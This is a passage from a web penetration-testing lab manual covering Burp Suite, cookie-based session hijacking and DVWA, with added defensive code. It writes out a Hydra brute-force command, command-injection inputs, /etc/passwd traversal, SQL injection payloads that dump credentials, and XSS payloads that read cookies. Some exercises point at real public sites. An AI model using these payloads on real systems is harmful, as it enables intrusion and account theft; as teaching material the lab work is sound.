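198.51.100.7 - - [10/Oct/2024:13:55:40 +0000] "GET /admin HTTP/1.1" 404 196 "-" "gobuster/3.6"
198.51.100.7 - - [10/Oct/2024:13:55:40 +0000] "GET /backup HTTP/1.1" 404 196 "-" "gobuster/3.6"
198.51.100.7 - - [10/Oct/2024:13:55:41 +0000] "GET /config HTTP/1.1" 404 196 "-" "gobuster/3.6"
198.51.100.7 - - [10/Oct/2024:13:55:41 +0000] "GET /uploads HTTP/1.1" 403 196 "-" "gobuster/3.6"
198.51.100.7 - - [10/Oct/2024:13:55:42 +0000] "GET /test HTTP/1.1" 404 196 "-" "gobuster/3.6"
198.51.100.7 - - [10/Oct/2024:13:55:42 +0000] "GET /old HTTP/1.1" 404 196 "-" "gobuster/3.6"
203.0.113.5 - - [10/Oct/2024:13:56:02 +0000] "GET /missing.png HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; None if it does not match."""
    match = LOG_RE.match(line)
    if not match:
        return None
    rec = match.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_enumeration(log_text: str, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Return {ip: (hit count, paths)} for clients with >= threshold 403/404s in a window."""
    recent = defaultdict(deque)   # ip -> (timestamp, path) within the window
    alerts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] not in (403, 404):
            continue
        window = recent[rec["ip"]]
        window.append((rec["ts"], rec["path"]))
        while window and (rec["ts"] - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            alerts[rec["ip"]] = (len(window), [path for _, path in window])
    return alerts


if __name__ == "__main__":
    for ip, (count, paths) in detect_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {count} not-found/forbidden responses, e.g. {paths[:3]}")
```

The user-agent string is deliberately not part of the rule: it is trivially changed on the client side, whereas the response-code rate is a property of the behaviour itself. A single genuine 404 from a normal visitor (the last line) never reaches the threshold.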

Practical 11: Web Application Security Testing with Burp Suite.

Aim
The aim of this practical is to provide participants with a thorough
understanding and hands-on experience in conducting web application security
testing using Burp Suite, a leading tool for identifying security vulnerabilities in
web applications. This practical will guide participants through both manual
testing techniques and automated scanning processes to discover and assess a
range of common security vulnerabilities, such as SQL injection, Cross-Site
Scripting (XSS), Cross-Site Request Forgery (CSRF), and security
misconfigurations.

Step 1: Download Burp Suite from the following link: https://portswigger.net/burp/communitydownload

Step 2: Select the Proxy tab and go to Open browser.

Step 3: Now target a website, here https://google.com/

Step 4: Then turn off Intercept.

Step 5: Finally we capture the request and check it in HTTP history.

Conclusion:
This practical highlighted the importance of security testing for identifying and
mitigating vulnerabilities in web applications. By using Burp Suite, we were
able to simulate real-world attack scenarios, ensuring a deeper understanding of
application security and enhancing the ability to safeguard web applications
against potential threats.

Practical 12: Session hijacking using cookie

Aim:
Session hijacking occurs when an attacker gains unauthorized access to a user's
session state. By stealing a valid session ID, the attacker can infiltrate the
system and potentially access sensitive data. One well-known example of a
session hijacking tool is WhatsApp Sniffer. The first notable session hijacking
attack took place on Christmas Day in 1994, carried out by Kevin Mitnick when
HTTP 0.9 was in use.

Step 1: Go to a website; here we are going to meesho.com.

Step 2: Open Cookie Editor, which is already added as an extension, and export the cookies as JSON.

Step 3: Import the JSON into the other browser.

Step 4: Then paste the copied JSON into the import box in the other browser.

Step 5: Logged in successfully using the cookies.

Conclusion:
In this practical, we explored how session hijacking can be performed by
exploiting vulnerable session management mechanisms through the use of
cookies. This attack emphasizes the critical importance of securing session
cookies in web applications to prevent unauthorized access.
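Why the export/import in Steps 2 to 5 works, and what a server can do about it, as an added example that is not part of the lab manual. The copied cookie succeeds because the bare session ID is the only thing the server checks. This block issues the session cookie with the HttpOnly, Secure and SameSite attributes, records a fingerprint of the client that created the session, and refuses (and revokes) the session when the same cookie is presented from a different client. The fingerprint inputs, session lifetime and in-memory store are assumptions.

```python
"""Harden session cookies and bind a session to the client that created it.

Added example (not the lab manual's code). Fingerprint inputs, lifetime
and the in-memory store are assumptions for the example.
"""
import hashlib
import hmac
import secrets
import time
from http.cookies import SimpleCookie

SESSION_TTL = 15 * 60          # seconds; assumption
_sessions = {}                 # session id -> record


def client_fingerprint(user_agent: str, ip: str) -> str:
    """Hash of client attributes that an exported cookie does not carry with it."""
    return hashlib.sha256(f"{user_agent}|{ip}".encode()).hexdigest()


def create_session(user: str, user_agent: str, ip: str, now=None) -> str:
    """Store a new session and return the Set-Cookie header value for it."""
    now = time.time() if now is None else now
    sid = secrets.token_urlsafe(32)              # 256 bits from the OS CSPRNG
    _sessions[sid] = {"user": user,
                      "fp": client_fingerprint(user_agent, ip),
                      "expires": now + SESSION_TTL}
    cookie = SimpleCookie()
    cookie["session"] = sid
    cookie["session"]["httponly"] = True         # page scripts cannot read it
    cookie["session"]["secure"] = True           # only sent over HTTPS
    cookie["session"]["samesite"] = "Strict"     # not sent on cross-site requests
    cookie["session"]["path"] = "/"
    return cookie.output(header="").strip()


def validate_session(cookie_header: str, user_agent: str, ip: str, now=None):
    """Return the user for a valid session, else None.

    A fingerprint mismatch is treated as a suspected hijack: the session is
    deleted so neither the copier nor the original client keeps it.
    """
    now = time.time() if now is None else now
    cookie = SimpleCookie()
    cookie.load(cookie_header)
    morsel = cookie.get("session")
    if morsel is None:
        return None
    sid = morsel.value
    rec = _sessions.get(sid)
    if rec is None or rec["expires"] < now:
        _sessions.pop(sid, None)
        return None
    if not hmac.compare_digest(rec["fp"], client_fingerprint(user_agent, ip)):
        _sessions.pop(sid, None)
        return None
    return rec["user"]


if __name__ == "__main__":
    header = create_session("alice", "Mozilla/5.0", "203.0.113.5")
    print("Set-Cookie:", header)
    cookie_value = header.split(";")[0]
    print("same client  ->", validate_session(cookie_value, "Mozilla/5.0", "203.0.113.5"))
    print("other client ->", validate_session(cookie_value, "Firefox/128", "198.51.100.9"))
```

Binding to the client IP is a trade-off: it breaks legitimately for users whose address changes (mobile networks, VPN reconnects), so many sites bind only to more stable attributes and rely on short lifetimes, re-authentication for sensitive actions and HttpOnly to keep the ID away from scripts.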
Practical 13: Enumeration techniques in Penetration testing
Aim:
To explore enumeration methods for gathering system information. Here I use
the “Amass” tool for enumeration in penetration testing.
Amass is a powerful open-source tool used for reconnaissance and enumeration
in penetration testing. It focuses primarily on discovering assets related to a
target domain, such as subdomains, IP addresses, and associated networks

Steps:
1. Open "Terminal" in Kali Linux.
2. Type "amass enum -d www.netlify.com | column -t"
Where: enum = subcommand for performing enumeration tasks with Amass, -d = target domain, www.netlify.com = target, column -t = create a table by aligning the output into columns.

Conclusion: Effective enumeration reveals critical details about the target system, aiding penetration testing efforts.

Practical 14: Web Application scanning in Nessus

Aim: To perform a vulnerability scan on web applications using Nessus.

Web application scanning (WAS) in Nessus is a capability used to identify vulnerabilities, misconfigurations, and weaknesses in web applications. While Nessus primarily focuses on traditional network and host-based vulnerabilities, its Web Application Scanning functionality can provide significant insights into application-layer risks.
Steps:
Step 1: Install and enable the Nessus tool.
Step 2: Register and log in to Nessus.
Step 3: Click on "Create a new scan".
Step 4: Then click on "Basic Network Scan".
Step 5: Then give the Name, Description and Target, and click on "Save".
Step 6: Then click the play button to launch the scan.
Step 7: Once the scan is done, open the scan.

Conclusion: Nessus identifies vulnerabilities and compliance issues, facilitating proactive risk management.

Practical 15: Web application techniques using OWASP ZAP
Aim: To detect web application vulnerabilities using OWASP ZAP.
Steps:
1. Install Zaproxy.
2. Select Automated Scan.
3. Give the URL to attack. In my case I give "http://altoro.testfire.net/", and click on Attack.
4. Go to the Alerts tab, where we can see all the file details of http://altoro.testfire.net/

Conclusion: OWASP ZAP simplifies vulnerability detection, promoting secure
web application development.
Practical 16: Techniques with burp suite

Aim: To use Burp Suite for advanced security testing techniques.

1. Proxy
Captures and allows manipulation of HTTP/S traffic between your browser and
the target server.
Steps:
1. Go to the Proxy tab and turn on Intercept.
2. Request anything in the browser.
3. It shows the browser's requests.

2. Target

Helps you define and manage your scope, mapping out the application structure and tracking identified issues.
Steps:
1. Intercept any request.
2. Go to the Target tab and send the request to Intruder.
3. Add payload positions (variables) to the username and password.
4. Select the "Cluster bomb" attack type.
5. Create username.txt and password.txt files.
6. Load the username.txt file.
7. Select Payload position = 2 and Payload type = Runtime file.
8. Select the password.txt file.
9. Click on "Start attack".
10. It shows the result. If the length of any request is greater than "0", that request carried the correct credentials.

Conclusion:
Burp Suite enhances testing capabilities, allowing identification and
exploitation of complex vulnerabilities.

Practical 17: Penetration DVWA - easy, medium, hard.

Aim: The aim of penetrating the Damn Vulnerable Web Application (DVWA)
is to practice and enhance web application security testing skills by exploiting
known vulnerabilities in a controlled environment. It helps security
professionals and learners understand common web vulnerabilities and their
exploitation methods.
Definition: DVWA (Damn Vulnerable Web Application) is a deliberately
vulnerable web application designed for security testing and learning purposes.
Penetration testing of DVWA involves exploiting vulnerabilities such as SQL
injection, cross-site scripting (XSS), command injection, and insecure file
uploads to gain insights into how these weaknesses operate and how to mitigate
them in real-world applications.
Brute Force Attacks
Brute force attacks involve systematically attempting all possible combinations
of usernames and passwords to gain unauthorized access. The difficulty levels
in DVWA simulate different levels of defences against brute-force attacks.
Here’s how to approach each level:
Low Security Level:
• Example Hydra command:

hydra -l admin -P SecLists/Passwords/2020-200_most_used_passwords.txt 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=medium; PHPSESSID=em9smneejvkmrn41g4f7dvavgv:Username and/or password incorrect." -V

Medium and Hard Security Levels:

Step 1: Capture the login request.

Step 2: Run the brute-force attack against the login page.

• Select the login credential fields (username and password) as payload positions in this tool.

• Then set the payload username file and password file.

Step 3: After obtaining the username and password, enter them into the website's login form.
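The server-side control that the Hydra and Intruder runs above are probing for, as an added example that is not DVWA's code: a login routine that stores salted PBKDF2 hashes, compares in constant time, counts failures per account and applies a lock-out whose duration doubles each time the threshold is crossed, so a 200-entry wordlist no longer completes in seconds. The user store, thresholds and lock-out base are constructed.

```python
"""Login throttling and lock-out that blunt wordlist attacks on a login form.

Added example (not DVWA's code). The user store, failure threshold and
lock-out base time are assumptions for the example.
"""
import hashlib
import hmac
import os
import time

PBKDF2_ITERATIONS = 100_000   # assumption; raise for production hardware
MAX_FAILURES = 5              # failures before the first lock-out (assumption)
BASE_LOCK_SECONDS = 30        # first lock-out; doubles on each further threshold


def hash_password(password: str, salt: bytes = None) -> tuple:
    """Return (salt, PBKDF2-HMAC-SHA256 digest) for a password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


# Constructed user store: one account with a salted hash computed at import time.
_USERS = {"admin": hash_password("correct horse battery staple")}
_failures = {}   # user -> (consecutive failures, locked_until timestamp)


def login(user: str, password: str, now=None) -> str:
    """Return 'ok', 'bad-credentials' or 'locked'."""
    now = time.time() if now is None else now
    count, locked_until = _failures.get(user, (0, 0.0))
    if now < locked_until:
        return "locked"           # do not even check the password while locked

    record = _USERS.get(user)
    if record is None:
        # Same hashing cost for unknown users so timing does not reveal valid names.
        hash_password(password, b"\x00" * 16)
    else:
        salt, expected = record
        _, actual = hash_password(password, salt)
        if hmac.compare_digest(expected, actual):
            _failures.pop(user, None)   # success resets the counter
            return "ok"

    count += 1
    if count >= MAX_FAILURES:
        # 30 s after the 5th failure, 60 s after the 6th, 120 s after the 7th...
        locked_until = now + BASE_LOCK_SECONDS * 2 ** (count - MAX_FAILURES)
    _failures[user] = (count, locked_until)
    return "bad-credentials"


if __name__ == "__main__":
    for guess in ["123456", "password", "admin", "letmein", "qwerty", "welcome"]:
        print(guess, "->", login("admin", guess))
```

The response string is the same for a wrong password and an unknown user, and the failure counter is keyed by account rather than by client address, because the wordlist run in the Hydra command above comes from a single source but a distributed one would not. Pairing this with a per-IP limit and a CAPTCHA after a few failures is the usual full picture.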

Command Injection
Command injection is a vulnerability that occurs when an attacker can execute arbitrary commands on a host operating system via a vulnerable application. In DVWA (Damn Vulnerable Web Application), this vulnerability can be exploited to understand different security levels. Here's how it works at each security level in DVWA:
I. Low Security Level

Steps:
1. Log in to DVWA and navigate to the "Command Injection" section.
2. Start with the Low level and gradually move to higher levels.
3. Use inputs like: 127.0.0.1;pwd

II. Medium Security Level

Here, some basic sanitization is applied, but it can often be bypassed.

Steps:
1. Log in to DVWA and navigate to the "Command Injection" section.
2. Start with the Medium level and gradually move to the level above the previous one.
3. Use inputs like:
• 127.0.0.1&pwd

Step 2: Click Submit and view the output.

III. High Security Level:
At this level, stronger sanitization techniques are applied, like filtering user input more rigorously.
Step 1: Use inputs like: 127.0.0.1|ls

Step 2: You can get through using a symbol like |, which is not blocked.
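Why the three inputs above behave as they do, and what the fix looks like, as an added example that is not DVWA's PHP. The "ping" feature takes an address and builds a shell command: the low level concatenates the input, the medium level strips ";" and "&&" (a blocklist, which is why "&" and "|" still get through), and the hardened version validates the input as an IP address and hands it to the program as a separate argv element so no shell ever parses it. The function names are constructed; DVWA's real blocklists differ in detail.

```python
"""Command injection: DVWA-style blocklists beside an allowlist fix.

Added example (not DVWA's PHP). The low/medium functions only build or
filter the command string so the difference is visible without running
anything; the hardened function returns an argv list for subprocess.run.
"""
import ipaddress


def build_command_low(target: str) -> str:
    """Level 'low': raw concatenation, executed through a shell in DVWA."""
    return "ping -c 4 " + target


def sanitize_medium(target: str) -> str:
    """Level 'medium': a blocklist of two separators; every other metacharacter passes."""
    return target.replace("&&", "").replace(";", "")


def contains_shell_metacharacters(s: str) -> bool:
    """True if a shell would read the string as more than one plain argument."""
    return any(ch in s for ch in ";&|`$()<>\n")


def build_ping_argv(target: str) -> list:
    """Hardened version: allowlist validation, then an argv list (no shell).

    ipaddress.ip_address accepts only a syntactically valid IPv4/IPv6
    address, so the value passed on can never contain shell syntax, and
    because it goes to subprocess.run(argv) as its own element there is no
    shell to interpret it anyway.
    """
    try:
        ip = ipaddress.ip_address(target.strip())
    except ValueError:
        raise ValueError(f"not an IP address: {target!r}") from None
    return ["ping", "-c", "4", str(ip)]


def classify(target: str) -> dict:
    """Show how one input fares at each level (for the demo and the tests)."""
    try:
        hardened = build_ping_argv(target)
    except ValueError:
        hardened = "rejected"
    return {
        "low": build_command_low(target),
        "medium": sanitize_medium(target),
        "medium_still_injectable": contains_shell_metacharacters(sanitize_medium(target)),
        "hardened": hardened,
    }


if __name__ == "__main__":
    for sample in ("127.0.0.1", "127.0.0.1;pwd", "127.0.0.1&pwd", "127.0.0.1|ls"):
        print(sample, "->", classify(sample))
```

The lesson generalises beyond DVWA: a blocklist of characters is always one character short, while validating against the shape the input must have (here, an IP address) and avoiding the shell entirely closes the whole class.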

Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) is a type of attack where an attacker tricks a victim into making an unwanted request to a web application on which the victim is authenticated. This can lead to unintended actions such as changing account settings, making financial transfers, or deleting data without the victim's knowledge.
1. Low Level:
At this level, DVWA provides a very basic demonstration of CSRF vulnerabilities. The application does not have protections such as anti-CSRF tokens or validation mechanisms, so CSRF attacks can be executed easily.
Step 1: Go to the CSRF page.
Step 2: Here, in low security, we can easily change the password by changing the URL.
2. CSRF Attack (Medium)
At the medium level, DVWA introduces some basic protections, like a CSRF token, to prevent simple CSRF attacks. The application now requires a token to validate requests, which must be included with the form submission.
• Examine the CSRF token:
o When you try to submit the form to change your password, you will notice a CSRF token field hidden in the form.
o This token is included in the form to ensure that the request is legitimate and not forged by an attacker.
• Capture the CSRF token:
o Open the developer tools in your browser (F12) and inspect the page to find the CSRF token.
• Create the malicious request with the CSRF token:
o Modify your malicious HTML form to include the CSRF token.

3. CSRF Attack (Hard)
At the hard level, DVWA adds additional protection mechanisms, such as stricter token validation and possibly referrer checking, making it even harder to perform a CSRF attack.
Steps:
1. Navigate to the CSRF Page: Go to the CSRF page in DVWA.
2. Examine the Advanced Protection Mechanisms: At this level, DVWA may check the referrer header in the request. This helps ensure that the request is coming from the correct domain. If the referrer is not valid, the request will be rejected.
3. Bypass the CSRF Token with Advanced Techniques: Even if you manage to capture the CSRF token, DVWA may require additional verification, such as ensuring the referrer matches the application domain. In some cases, attackers may try Cross-Site Scripting (XSS) or use third-party tools to manipulate headers and bypass these protections.
4. Execute the Attack: To exploit this vulnerability at the hard level, you may need advanced techniques, like using a proxy tool (e.g., Burp Suite) to manipulate HTTP headers, or scripting attacks to simulate valid requests with the correct referrer header and token.
5. Observe the Result: If the CSRF attack is successful despite these protections, it indicates a weak implementation of security mechanisms. However, a properly implemented CSRF protection would reject the malicious request.
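The "properly implemented CSRF protection" the last step refers to, as an added example that is not DVWA's code: a per-session random token placed in the hidden form field and compared in constant time when the form is submitted, rotated after each successful change so a captured token cannot be replayed, plus the Origin/Referer check the hard level approximates. The site origin, session store and form markup are assumptions; the field name user_token is the one DVWA's form uses.

```python
"""Anti-CSRF token with rotation, plus an Origin/Referer check.

Added example (not DVWA's code). SITE_ORIGIN, the session store and the
form markup are assumptions for the example.
"""
import hmac
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "https://dvwa.example.test"   # assumption
_csrf_tokens = {}                            # session id -> current token


def issue_csrf_token(session_id: str) -> str:
    """Return the session's current token, creating one on first use."""
    return _csrf_tokens.setdefault(session_id, secrets.token_hex(32))


def render_change_password_form(session_id: str) -> str:
    """The form as served to the browser, token in a hidden field (medium level)."""
    token = issue_csrf_token(session_id)
    return ('<form method="post" action="/vulnerabilities/csrf/">'
            f'<input type="hidden" name="user_token" value="{token}">'
            '<input type="password" name="password_new">'
            '<input type="submit" name="Change" value="Change"></form>')


def request_origin_ok(headers: dict) -> bool:
    """Hard level: a state-changing request must come from our own origin.

    Origin is preferred; Referer is the fallback. A request carrying
    neither is refused rather than waved through.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    got, want = urlparse(source), urlparse(SITE_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def change_password(session_id: str, form: dict, headers: dict) -> str:
    """Return 'changed' or a rejection reason, checking origin first, then token."""
    if not request_origin_ok(headers):
        return "rejected: bad origin"
    expected = _csrf_tokens.get(session_id)
    supplied = form.get("user_token", "")
    if expected is None or not hmac.compare_digest(expected, supplied):
        return "rejected: bad csrf token"
    # The token is single-use: rotate it so a captured copy cannot be replayed.
    _csrf_tokens[session_id] = secrets.token_hex(32)
    return "changed"


if __name__ == "__main__":
    html = render_change_password_form("sess1")
    token = html.split('value="')[1].split('"')[0]
    print(change_password("sess1", {"password_new": "x", "user_token": token},
                          {"Origin": SITE_ORIGIN}))
    print(change_password("sess1", {"password_new": "x", "user_token": token},
                          {"Origin": SITE_ORIGIN}))   # replay of the used token
```

A token in a hidden field only helps if the attacker's page cannot read it, which is why the medium-level walkthrough above needs developer tools on the victim's own browser, and why an XSS flaw on the same origin (mentioned under the hard level) undermines CSRF tokens entirely: same-origin script can read the form.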

File Inclusion (Easy)

At the easy level, DVWA provides no protection against file inclusion attacks, allowing direct exploitation.
Step: Change the URL by replacing the page parameter value with ../../../../etc/passwd
File Inclusion (Medium)
At the medium level, the application attempts to sanitize the input by removing http:// and https:// from the page parameter. However, it still does not validate the content of the page parameter for directory traversal or malicious paths. These lines remove http:// and https:// from the page parameter, preventing remote file inclusion.
1. Test for Local File Inclusion (LFI):
o Since directory traversal is not blocked, attempt to include sensitive local files:
http://192.168.1.39/dvwa/vulnerabilities/fi/?page=../../../../etc/passwd

File Inclusion (Hard)
At the hard level, DVWA adds stronger protections, such as strict input validation and whitelist-based inclusion.
o Try Bypassing with Encoding:
o Use URL encoding for directory traversal:
http://192.168.1.39/dvwa/vulnerabilities/fi/?page=..%2f..%2f..%2f..%2fetc%2fpasswd

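The contrast between the medium level (strip the remote schemes only) and the hard level (whitelist the page name) is illustrated below as an added example, not DVWA's code. The web root path and the set of allowed page names are assumed for the example; the point is that stripping prefixes leaves traversal intact, while a whitelist applied after URL-decoding rejects both the plain and the %2f-encoded traversal.

```python
import os
from urllib.parse import unquote

# Assumed values for the example: where the vulnerable module's pages live and
# which page names are legitimate.
WEB_ROOT = "/var/www/html/dvwa/vulnerabilities/fi"
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}


def medium_sanitize(page: str) -> str:
    """Medium-level idea: remove remote-scheme prefixes so http(s):// URLs cannot be included."""
    return page.replace("http://", "").replace("https://", "")


def medium_allows_traversal(page: str) -> bool:
    """Show the gap: after medium_sanitize, does the resolved path escape WEB_ROOT?"""
    cleaned = medium_sanitize(page)
    resolved = os.path.normpath(os.path.join(WEB_ROOT, cleaned))
    return not resolved.startswith(WEB_ROOT + os.sep)


def hard_resolve(page: str):
    """Hard-level idea: decode first, then accept only an exact whitelisted name.

    Returns the file path to include, or None when the request must be refused.
    """
    decoded = unquote(page)           # collapse %2f, %2e etc. BEFORE deciding
    if decoded not in ALLOWED_PAGES:  # no prefixes, no traversal, no schemes
        return None
    return os.path.join(WEB_ROOT, decoded)
```

Because `hard_resolve` compares the whole decoded value against a fixed set, there is nothing left to encode around: any value that is not literally one of the allowed names is refused.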
File upload: easy mode
Step 1: For Low, create one PHP file and enter the above script in that file.
Step 2: Now upload the file; it will be successfully uploaded.
Medium:
Step 1: For Medium, just change the extension from .php to .jpg, as the form accepts jpg | jpeg | png etc.
Step 2: After changing the file extension, upload the file; it will be successfully uploaded.
Hard:
Step 1: For High, install exiftool: sudo apt install exiftool
Step 2: Upload a file with the upload box.
Step 3: Then download any jpg/jpeg/png image and put it in the same place where the PHP file is created.

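The three upload levels above differ only in how much of the file the server inspects: nothing (Low), the extension (Medium), and the image header (High, which is why the walkthrough reaches for exiftool to plant content inside a real image). The added example below, not DVWA's code, shows the layered validation a defender wants: extension whitelist, declared content type, a size cap, magic-byte check, a scan for PHP open tags anywhere in the bytes (which catches the metadata trick), and finally storage under a random name outside the web root. The size limit and the upload directory are assumed values.

```python
import secrets
from pathlib import PurePosixPath

ALLOWED_EXT = {"jpg", "jpeg", "png"}       # the jpg | jpeg | png list from this practical
MAX_BYTES = 100_000                        # assumed size cap for the example
UPLOAD_DIR = "/srv/uploads"                # assumed: outside the web root, never served as PHP
MAGIC = {
    b"\xff\xd8\xff": "jpg",                # JPEG start-of-image marker
    b"\x89PNG\r\n\x1a\n": "png",           # PNG signature
}


def detect_image_type(data: bytes):
    """Identify the real file type from its leading bytes, ignoring the client's name."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename: str, data: bytes, declared_type: str):
    """Return (ok, reason). Every check must pass; none of them trusts the client alone."""
    ext = PurePosixPath(filename).suffix.lower().lstrip(".")
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    if declared_type not in ("image/jpeg", "image/png"):
        return False, "content-type not allowed"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    kind = detect_image_type(data)
    if kind is None:
        return False, "content is not a JPEG or PNG"       # e.g. a .php file renamed to .jpg
    if (kind == "jpg") != (ext in ("jpg", "jpeg")):
        return False, "extension does not match content"
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag found"             # e.g. planted via image metadata
    return True, "ok"


def stored_name(filename: str) -> str:
    """Never reuse the client's filename: random name plus the already-verified extension."""
    ext = PurePosixPath(filename).suffix.lower()
    return f"{UPLOAD_DIR}/{secrets.token_hex(16)}{ext}"
```

Even a file that passes all checks is written with a random name in a directory the web server will not execute, so a future bypass of the content checks still does not yield code execution.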
SQL Injection easy
o For Low security we can enter 1' OR '1'='1' --; as I have given the command 1' union select 1,2#

Medium:
Step 1: We cannot enter an SQL command in the input box.
Step 2: But send the request to the intercepting proxy and modify the request with the SQL command.
Step 3: After modifying the SQL command, forward the request to the database. With this we can run any command in the SQL database;
o This command is like: union select user, password from dvwa.users limit 0,1#

Hard:
Step 1: In this type of attack we first enter some type of command, like: union select user, password from dvwa.users limit 0,1#
Step 2: Just type this command in the box and you can access the database of the website.
Step 3: You can see below; just type and send it to the database and get the list of the user table with credentials.

Weak Session ID:
Step 1: For the Low security level, click "Generate", view the source code at the bottom, or use Burp Suite to inspect the cookie and request details.

Step 3: In Medium and High modes, calculate the session ID's timestamp and date.
Step 4: Use Burp Suite to capture the request, extract the cookie, and decode it using the Epoch Converter website.

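The decoding done by hand with the Epoch Converter above, plus the fix, as an added example (not DVWA's code): a session ID derived from the clock can be recovered from the cookie and predicted for other users, whereas one drawn from the OS random source carries no such structure. The five-minute window in `is_predictable` is an assumed heuristic for flagging timestamp-shaped cookies in captured traffic.

```python
import secrets
from datetime import datetime, timezone


def weak_session_id(now: float) -> str:
    """Time-based ID of the kind inspected in this practical: just the Unix timestamp as text."""
    return str(int(now))


def decode_weak_session_id(cookie: str) -> datetime:
    """What the Epoch Converter step does: recover the issue time from the cookie value."""
    return datetime.fromtimestamp(int(cookie), tz=timezone.utc)


def is_predictable(cookie: str, observed_at: float, window: int = 300) -> bool:
    """Heuristic check for captured cookies: an all-digit value that decodes to a time
    within `window` seconds of its capture is almost certainly clock-derived."""
    try:
        issued = int(cookie)
    except ValueError:
        return False
    return abs(observed_at - issued) <= window


def strong_session_id() -> str:
    """Mitigation: 32 bytes from the CSPRNG, URL-safe encoded, unrelated to the clock."""
    return secrets.token_urlsafe(32)
```

`strong_session_id` gives 256 bits of entropy per cookie, so guessing another user's value is not feasible, and nothing about the value reveals when it was issued.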
CSP Bypass:
Step 1: For Low, open the source code and paste the http link given in the source code to produce output.
Step 2: For Medium, open the source code and paste the link, or you can also enter it using Burp Suite.

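The bypass at these levels works because the policy in the page source already trusts a host (or allows inline script) that an attacker can get content onto. The added example below, which is not part of this manual or DVWA, is a small reviewer for a Content-Security-Policy header: it parses the directives and lists the script sources that make the policy bypassable. The sample headers in the test are constructed.

```python
def parse_csp(header: str) -> dict:
    """Split a Content-Security-Policy header into {directive: [source, ...]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def csp_script_findings(header: str, own_origin: str) -> list:
    """List the reasons script could be loaded from somewhere the policy already trusts."""
    policy = parse_csp(header)
    sources = policy.get("script-src", policy.get("default-src", []))
    if not sources:
        return ["no script-src or default-src: scripts are unrestricted"]
    findings = []
    for src in sources:
        low = src.lower()
        if low in ("'unsafe-inline'", "'unsafe-eval'"):
            findings.append(f"{src} permits inline or eval'd script")
        elif "*" in low or low in ("http:", "https:", "data:"):
            findings.append(f"{src} is a wildcard or scheme-only source")
        elif low == "'self'" or low == own_origin.lower() or low.startswith(
                ("'nonce-", "'sha256-", "'sha384-", "'sha512-")):
            continue                       # bound to this site or to a specific script
        else:
            findings.append(f"{src} is an external host; any script it serves runs in the page")
    return findings
```

The hardened policy is the one that produces no findings: `'self'` plus a per-response nonce or hash, and no third-party hosts whose content users can influence.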
Cryptography:
Step 1: Set DVWA security levels to Low, Medium, and High to perform all tests.
Step 2: Encode and decode messages using the appropriate formulas, including MD5 hashing.

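Step 2 groups encoding and hashing together, and the difference matters for the rest of this module: an encoding such as Base64 is reversible by design, while a hash such as MD5 is one-way, and MD5 in particular is too fast and unsalted to protect stored passwords. The added example below (not DVWA's code) puts the three side by side: reversible encoding, an MD5 digest, and a salted PBKDF2 password hash with a constant-time verify. The iteration count is an assumed value.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Optional

PBKDF2_ROUNDS = 200_000          # assumed work factor for the example


def encode_b64(msg: str) -> str:
    """Encoding: anyone can reverse it, so it hides nothing."""
    return base64.b64encode(msg.encode()).decode()


def decode_b64(token: str) -> str:
    return base64.b64decode(token).decode()


def md5_hex(msg: str) -> str:
    """Hashing: fixed 128-bit digest, not reversible, but fast and unsalted."""
    return hashlib.md5(msg.encode()).hexdigest()


def looks_like_md5(value: str) -> bool:
    """Recognise the 32-hex-digit shape of an MD5 digest in captured data."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value.lower())


def hash_password(pw: str, salt: Optional[bytes] = None) -> str:
    """Password storage: random per-user salt and a slow KDF instead of a bare MD5."""
    salt = salt or secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + dk.hex()


def verify_password(pw: str, stored: str) -> bool:
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(dk.hex(), dk_hex)
```

The salt ensures that two users with the same password get different stored values, so a precomputed table of MD5 digests (the usual way a captured unsalted hash is turned back into a password) does not apply.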
XSS DOM: (easy)
Step 1: For Low, select the default language, add <script>alert("XSS")</script> in the URL and press Enter; it will alert 'XSS' on screen.
Step 2: Same for getting the cookie value; add <script>alert(document.cookie)</script>

Medium:
Step 1: For Medium, add #<script>alert("Hello")</script> in the URL
Step 2: Same for getting the cookie value; add #<script>alert(document.cookie)</script>

Hard:
Step 1: For High, add #<script>alert("XSS")</script> in the URL
Step 2: Same for getting the cookie value; add #<script>alert(document.cookie)</script>

XSS (Reflected):
XSS (Reflected) Vulnerability (Easy)
At the easy level, DVWA allows unsanitized user input to be directly reflected back into the page. This makes it very easy to inject malicious scripts.
Step 1: For Low use <script>alert("XSS")</script> in the input column.
o Navigate to the Reflected XSS Page: go to the XSS (Reflected) vulnerability page: http://192.168.1.39/dvwa/vulnerabilities/xss_r/
